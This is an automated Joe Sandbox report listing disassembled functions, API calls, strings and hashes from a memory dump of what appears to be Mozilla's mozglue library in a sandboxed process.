                                                                  • Opcode ID: 5e634d51ad3a95b49c28cb3a5831afb1ba727d6be2452c8fd66599375aa9bfde
                                                                  • Instruction ID: 5efd4946944d6e5f2cae83f41b7a406b5efa83449e89e07ad29698096207f7a2
                                                                  • Opcode Fuzzy Hash: 5e634d51ad3a95b49c28cb3a5831afb1ba727d6be2452c8fd66599375aa9bfde
                                                                  • Instruction Fuzzy Hash: EC01F4327042085BCB169FA8D880AEFBBB5EF89210F840529E8126B340DB317909C7F5
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C0AE878
                                                                    • Part of subcall function 6C075C50: GetTickCount64.KERNEL32 ref: 6C075D40
                                                                    • Part of subcall function 6C075C50: EnterCriticalSection.KERNEL32(6C0DF688), ref: 6C075D67
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C0AE8AC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: StampTimeV01@@Value@mozilla@@$Count64CriticalEnterSectionTick
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1404550236-2178588373
                                                                  • Opcode ID: 7d579972f015daed2c8e6a619505bedbc1383da298469a53305b2a0ecd1f8148
                                                                  • Instruction ID: 129b8443af57ca09dbb471c2f05ca6680a08c3db01df64238cf2f7232cc70e30
                                                                  • Opcode Fuzzy Hash: 7d579972f015daed2c8e6a619505bedbc1383da298469a53305b2a0ecd1f8148
                                                                  • Instruction Fuzzy Hash: CAF04C21A1424457A724CFBD9C815EBB7E5DFC9264B60032AE81453241FF7075DA42D1
                                                                  APIs
                                                                  • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE(#%02u: ??? (???:???),?,?,?,?,6C0B6CA1), ref: 6C0B6D51
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?,#%02u: ??? (???:???),?,?,?,?,6C0B6CA1), ref: 6C0B6D6B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: PrintfTarget@mozilla@@$?vprint@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2004917493-2178588373
                                                                  • Opcode ID: 98abec3d31783c3d7abe79ef180312a174fad401bb63fcb7fa1b4432bf9094d9
                                                                  • Instruction ID: b8291ba574affa083b0d983331cc15b535bb2e6d2407c7eb5a38393b8d534c7e
                                                                  • Opcode Fuzzy Hash: 98abec3d31783c3d7abe79ef180312a174fad401bb63fcb7fa1b4432bf9094d9
                                                                  • Instruction Fuzzy Hash: 2D011D71B002199FCF109F59C890ADFBBE8EF48654B51841AE8599B740DB31A944CBE0
                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C06081B), ref: 6C069B60
                                                                  • __Init_thread_footer.LIBCMT ref: 6C069B73
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: InfoInit_thread_footerSystem
                                                                  • String ID: 3JT/
                                                                  • API String ID: 995596006-2178588373
                                                                  • Opcode ID: f9468a5beee239568f1f6ea08a85e78d2014eca8c456c4530cc177afd0b8a687
                                                                  • Instruction ID: ba58acaaeb502faf5725899afcc8b6b695f50fd19175a4839b956a125401c14a
                                                                  • Opcode Fuzzy Hash: f9468a5beee239568f1f6ea08a85e78d2014eca8c456c4530cc177afd0b8a687
                                                                  • Instruction Fuzzy Hash: 3A018131A006048FCB00DF69C984AA9B3F8EB0B614B458525DD055BB81DB317A848FD6
                                                                  APIs
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C0BB92D), ref: 6C069BC8
                                                                  • __Init_thread_footer.LIBCMT ref: 6C069BDB
                                                                    • Part of subcall function 6C08AB3F: EnterCriticalSection.KERNEL32(6C0DE370,?,?,6C053527,6C0DF6CC,?,?,?,?,?,?,?,?,6C053284), ref: 6C08AB49
                                                                    • Part of subcall function 6C08AB3F: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C053527,6C0DF6CC,?,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08AB7C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$InfoInit_thread_footerSystem
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1545129971-2178588373
                                                                  • Opcode ID: 95d016dd7b0d919ec4b229fe50babb9e79c4cd58aad8208d2b485193fe8b4c57
                                                                  • Instruction ID: edb76404db3a6827548d72e3bdbc7c1d3839f110c854d91b62f72326f7cbb467
                                                                  • Opcode Fuzzy Hash: 95d016dd7b0d919ec4b229fe50babb9e79c4cd58aad8208d2b485193fe8b4c57
                                                                  • Instruction Fuzzy Hash: D4F04F71B012048BCF00DF69D894AAAB7F8EB0A728B55C525DD0697B90DB31B985CF92
                                                                  APIs
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                  • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: __acrt_iob_func__stdio_common_vfprintf
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2168557111-2178588373
                                                                  • Opcode ID: 6108d3c80e7f217e790c6fd04db6530127ac442b336cdd9870cb91b7f842caac
                                                                  • Instruction ID: e6a112d502353c3aa2ec34af967e1af9655b928e7eb80c0483bb160d280cdbcb
                                                                  • Opcode Fuzzy Hash: 6108d3c80e7f217e790c6fd04db6530127ac442b336cdd9870cb91b7f842caac
                                                                  • Instruction Fuzzy Hash: 1AF05471A0011C6FDB005F65DC49EAFBF78EF45259F404025E9095B241DB317958CBE1
                                                                  APIs
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(%lld,?,?,?,?,?,?,6C060C42), ref: 6C08D97D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ?vprint@PrintfTarget@mozilla@@
                                                                  • String ID: %lld$3JT/
                                                                  • API String ID: 1200798046-173504297
                                                                  • Opcode ID: c96b65ea179db1ce3eb2883dfe17f770e545745020b2a8bfca28ec8992281c23
                                                                  • Instruction ID: 665b1964029ec1d68b092454edaf3dac9e31dc0553c71a781acda507b4fcfe58
                                                                  • Opcode Fuzzy Hash: c96b65ea179db1ce3eb2883dfe17f770e545745020b2a8bfca28ec8992281c23
                                                                  • Instruction Fuzzy Hash: AAF04971A002189BCB10AF59C85479BFBF8EF45610F81841AD99AAB740DB35B808CBE0
                                                                  APIs
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(0x%llx,?), ref: 6C0A38ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ?vprint@PrintfTarget@mozilla@@
                                                                  • String ID: 0x%llx$3JT/
                                                                  • API String ID: 1200798046-2716635833
                                                                  • Opcode ID: 1086b1f827be7cb7300164883efc64669aabe6cecb9fc9e6230836a18c6d7dcb
                                                                  • Instruction ID: c7824c0702d587df8ebdc3b513e963442694778fecf6418bbc584b0c00212279
                                                                  • Opcode Fuzzy Hash: 1086b1f827be7cb7300164883efc64669aabe6cecb9fc9e6230836a18c6d7dcb
                                                                  • Instruction Fuzzy Hash: 78F04971A002089BCB209F69C8547AFFBE8EF48310F40842ED89A97740DB34B408CBE1
                                                                  APIs
                                                                  • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0681DE
                                                                  Strings
                                                                  • 3JT/, xrefs: 6C0681BF
                                                                  • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime, xrefs: 6C0681B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: __stdio_common_vfprintf
                                                                  • String ID: expected a ProfilerOverheadDuration entry after ProfilerOverheadTime$3JT/
                                                                  • API String ID: 896710484-2299593715
                                                                  • Opcode ID: 39febec319c1d364b096e81f7db257e5b5b747dc5384977474a75dc383090a90
                                                                  • Instruction ID: 079bdcc8bbd25e8c02353f8feb96073fdca097e5eabc48906caed07591d5d66d
                                                                  • Opcode Fuzzy Hash: 39febec319c1d364b096e81f7db257e5b5b747dc5384977474a75dc383090a90
                                                                  • Instruction Fuzzy Hash: 42F05E3160021CAFCB009F69DC84A9FBBB8EF45264B404025EC096B200DB31B9188BE1
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C0B6E22
                                                                  • __Init_thread_footer.LIBCMT ref: 6C0B6E3F
                                                                  Strings
                                                                  • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C0B6E1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footergetenv
                                                                  • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                  • API String ID: 1472356752-1153589363
                                                                  • Opcode ID: 07156a2dd65e617894eead562fd9ae24b49453b483739e8ca392ba3fe0829508
                                                                  • Instruction ID: 6e05cb863e08ec23343f40e522a710aa6d1326c58d4d35ccc13ca61660b931f7
                                                                  • Opcode Fuzzy Hash: 07156a2dd65e617894eead562fd9ae24b49453b483739e8ca392ba3fe0829508
                                                                  • Instruction Fuzzy Hash: 2EF0BE756452408BDA04CB68C861B9577FE9713218F188165FC2997FA2DF32BA06CF93
                                                                  APIs
                                                                  • __stdio_common_vswprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000009,%08x,00000000,?,?,6C05ED93), ref: 6C08D920
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: __stdio_common_vswprintf
                                                                  • String ID: %08x$3JT/
                                                                  • API String ID: 1165403183-2197335965
                                                                  • Opcode ID: d3902251788c013487cebfd4b671992b85d179a1aabd1d2d4abbe10dbb5900f9
                                                                  • Instruction ID: 1443dba53f81cce47866583815174a0f03dbbafdb164c7bf8b738609090af8d3
                                                                  • Opcode Fuzzy Hash: d3902251788c013487cebfd4b671992b85d179a1aabd1d2d4abbe10dbb5900f9
                                                                  • Instruction Fuzzy Hash: 1BF03035A00218BBCB005F55EC05F9EBFB4EF85615F458065E9096B251DB317528CBE5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: InterruptQueryTimeUnbiased__aulldiv
                                                                  • String ID: 3JT/
                                                                  • API String ID: 218403179-2178588373
                                                                  • Opcode ID: 22b8010a3caf731add4396c970c607cbedbc684a0d23568461830da59c623f91
                                                                  • Instruction ID: 7eb63332c20b10ace20a44f52303b25b1493687adde914090b0c5006d46ff379
                                                                  • Opcode Fuzzy Hash: 22b8010a3caf731add4396c970c607cbedbc684a0d23568461830da59c623f91
                                                                  • Instruction Fuzzy Hash: 38F03731600204AFCB109F59DC41B9AFBF4EF89A31F408529EA6987690DB317514CBD1
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 6C069EEF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: Infinity$NaN
                                                                  • API String ID: 1385522511-4285296124
                                                                  • Opcode ID: 4fc7af64d6cf7592eeee6abe78e8526033c97e6fd18a6cc7883ba3e616017a09
                                                                  • Instruction ID: bac0e8be29953f2ee9a8ce581b3f03265fab18a866436d49dfd2c0e8e87ce08d
                                                                  • Opcode Fuzzy Hash: 4fc7af64d6cf7592eeee6abe78e8526033c97e6fd18a6cc7883ba3e616017a09
                                                                  • Instruction Fuzzy Hash: 67F032B1601741CADE008F58E84AB9033FBA747719F298A29CD040AF81DB7676868A83
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(0Kl,?,6C094B30,80000000,?,6C094AB7,?,6C0543CF,?,6C0542D2), ref: 6C066C42
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • moz_xmalloc.MOZGLUE(0Kl,?,6C094B30,80000000,?,6C094AB7,?,6C0543CF,?,6C0542D2), ref: 6C066C58
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: moz_xmalloc$malloc
                                                                  • String ID: 0Kl
                                                                  • API String ID: 1967447596-946262950
                                                                  • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                  • Instruction ID: 4cb134facdf1a20f1bf2ad8e78b39ea9a45e49194c22e676b8c06b8984544ac2
                                                                  • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                  • Instruction Fuzzy Hash: 1CE086F1A109454B9F08DD7ADC1977E71C88B542BCF084A35E822C7FC8FE74E5508151
                                                                  APIs
                                                                  • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C0D51C8), ref: 6C0B591A
                                                                  • CloseHandle.KERNEL32(FFFFFFFF), ref: 6C0B592B
                                                                  Strings
                                                                  • MOZ_SKELETON_UI_RESTARTING, xrefs: 6C0B5915
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CloseEnvironmentHandleVariable
                                                                  • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                  • API String ID: 297244470-335682676
                                                                  • Opcode ID: 8a5ac36d454dee946a14f58cce59b6f4f22de0a28e3236a050a8d9d2aa71ea28
                                                                  • Instruction ID: dd7d33e545b22781588ab9d7410080ae20ebb42b2d930e1c320367e9806b6967
                                                                  • Opcode Fuzzy Hash: 8a5ac36d454dee946a14f58cce59b6f4f22de0a28e3236a050a8d9d2aa71ea28
                                                                  • Instruction Fuzzy Hash: CAE04878205341B7DB009B68C5087557FF89B17729F148644FD6993ED1C7B678408791
                                                                  APIs
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF860), ref: 6C06385C
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF860,?), ref: 6C063871
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireRelease
                                                                  • String ID: ,l
                                                                  • API String ID: 17069307-303387729
                                                                  • Opcode ID: 61389280bd8ecd0fe8c00a1b8e9f03986da4404ee054c03fbcd574e25b68f6a8
                                                                  • Instruction ID: cdec070749e75bb9dfc27e278537c616228adde7ba6a11eb8b3c761826cca61d
                                                                  • Opcode Fuzzy Hash: 61389280bd8ecd0fe8c00a1b8e9f03986da4404ee054c03fbcd574e25b68f6a8
                                                                  • Instruction Fuzzy Hash: F4E04F31945B599BCA119F9794067DA7BFCEF4B69030AC10AF91A57E00CB30F58086D6
                                                                  APIs
                                                                  • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C06BEE3
                                                                  • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C06BEF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$CallsDisableLoadThread
                                                                  • String ID: cryptbase.dll
                                                                  • API String ID: 4137859361-1262567842
                                                                  • Opcode ID: d0f1b77d36c19bf8d66feeceed1cd0eed2eed3f5c79e21d6060d71bb5933e966
                                                                  • Instruction ID: 9eefb23bf078a19752ae6c68d4bbac429ba5919212721ec54302362a21b99f01
                                                                  • Opcode Fuzzy Hash: d0f1b77d36c19bf8d66feeceed1cd0eed2eed3f5c79e21d6060d71bb5933e966
                                                                  • Instruction Fuzzy Hash: 73D0C932284209FADA40AFA18D0AB293BF8AB02725F50C021FB5995D52CBB1B451DB98
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C054E9C,?,?,?,?,?), ref: 6C05510A
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C054E9C,?,?,?,?,?), ref: 6C055167
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C055196
                                                                  • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C054E9C), ref: 6C055234
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                  • Instruction ID: 2793ad26eeef05fb2d57ea0ef737d325a736957e1badd7c9df9f982f9743915c
                                                                  • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                  • Instruction Fuzzy Hash: 04918C79505616CFCB14CF09C490A5ABBE2FF89318B298688EC599B715D371FC92CBE0
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C0DE7DC), ref: 6C090918
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE7DC), ref: 6C0909A6
